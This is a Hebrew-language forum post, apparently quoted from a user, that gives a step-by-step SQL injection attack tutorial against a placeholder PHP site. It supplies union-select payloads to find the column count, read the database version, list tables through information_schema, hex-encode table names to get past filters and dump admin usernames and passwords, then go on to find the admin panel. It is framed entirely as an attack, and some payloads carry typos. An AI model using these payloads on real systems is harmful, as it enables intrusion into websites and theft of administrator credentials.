מדריך התקפת sql injection
שלום לכולם החלטתי ליכתוב מדריך חדש בנושא התקפת sql injection.
למדריך :
לדוגמא יש את האתר הבא : www.mysite.com/page.php?id=1
איך אנחנו נתחיל ליתקוף אותו? על ידי כך שניבדוק אם מיתקבלת שגיאה ובכך זה יאמר לנו אם הדף פריץ.
איך בודקים אם יש שגיאה? מוסיפים גרש '
קוד : www.mysite.com/page.php?id=1' (זה יראה הפוך תגרש שמים אחרי ה 1)
השגיאה אמורה להיראות בסיגנון :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/content/61/5481061/html/viewissue.php on line 10
לאחר שזה הציג בפנינו דף פריץ עלינו לימצוא את מיקום ההזרקה על ידי הפקודה union select
קוד : http://www.mysite.com/page.php?id=1+...elect+1,2,3,30
אנחנו ממשיכים מי 3 עד שזה יציג בפנינו פלט שבה נזריק שיאלתות. לדוגמא הציג לנו תפלט 4 שהגענו ל 8.
קוד : www.mysite.com/page.php?id=1+union+select+1,2,3,4,5,6,7,8
עכשיו נוציא את הגירסא של המסד על ידי הפקודה version@@
נכניס בפלט שזה שהראה לנו במיקרה שלנו 4 נשנה בימקום המיספר 4 תפקודה version@@
קוד : www.mysite.com/page.php?id=1+union+select+1,2,3,@@version,5,6,7,8
אם אתם תיראו גירסא 4+ אתם תיצטרכו לנחש database..
עכשיו הסבר אם תיראו גירסא 5+ :
בגירסא 5+ יש database שניקרא information_schema שם נימצאות כל הטבלאות.
אחרי שבדקנו תגירסא עלינו כמובן להוציא טבלאות איך אנחנו מוצאים טבלאות? נכניס בפלט 4 את הפקודה group_concat(table_name)
הסבר : הפקודה group_concat תראה לנו את כל הטבלאות.
ואחרי 8 נירשום from information_schema.tables
קוד : www.mysite.com/page.php?id=1+union+select+1,2,3,group_concat(table_name),5,6,7,8 from information_schema.tables
זה יציג בפנינו טבלאות.. נבחר טבלה שאנחנו רוצים לישלוף את הנתונים שלה.. נגיד כמה טבלאות כאלה בטוח יעניינו אותכם :
admin
user
admins
users
admin_user
login
adminuser
ועוד כאלה בסיגנון..
נגיד ומצאנו טבלה כזאת : admin ניבדוק את העמודות שלה.. על ידי שנכניס בפלט 4:
group_concat(column_name) אחרי המיספר 8 from information_schema.tables+where+table_name='admin'
קוד : www.mysite.com/page.php?id=1+union+select+1,2,3,group_concat(column_name),5,6,7,8+from+informat ion_schema.columns+where+table_name='admin'
יש אתרים שחוסמים תווים אז ניצטרך להמיר את admin ב hex
תיכנסו לאתר הזה : http://www.dolcevie.com/js/converter.html
תירשמו ב Ascii :
admin ואז תילחצו על ASCII To Hex אתם תיראו 61:64:6d:69:6e תורידו את הנקודותים להכל
תוסיפו 0x שזה יראה, כך 0x61646d696e עכשיו נשנה את ההזרקה
קוד : www.mysite.com/page.php?id=1+union+select+1.2.3.group_concat(column_name),5,6,7,8+from+informat ion_schema.columns+where+table_name=0x61646d696e
נגיד וזה הציג בפנינו עמודות כאלה :
username
pass
עכשיו נישלוף את הנתונים של העמודות username,pass איך שולפים? נכניס בפלט 4 group_concat(username,0x3a,pass) אחרי 8 from admin
הסבר: 0x3a עושה נקודותים לדוגמא yoram:123
קוד : www.mysite.com/page.php?id=1+union+select+1,2,3,group_concat(username,0x3a,pass),5,6,7,8 from admin
הנתונים שזה הציג בפנינו (דוגמא) :
amit122:2224456
שלב אחרון כמובן? מציאת פאנל ניהול.
אני מקווה שזה עזר לכם במשהו..
קרדיט ל..לי^^
ציטוט ההודעה
נכתב במקור על ידי facebook1
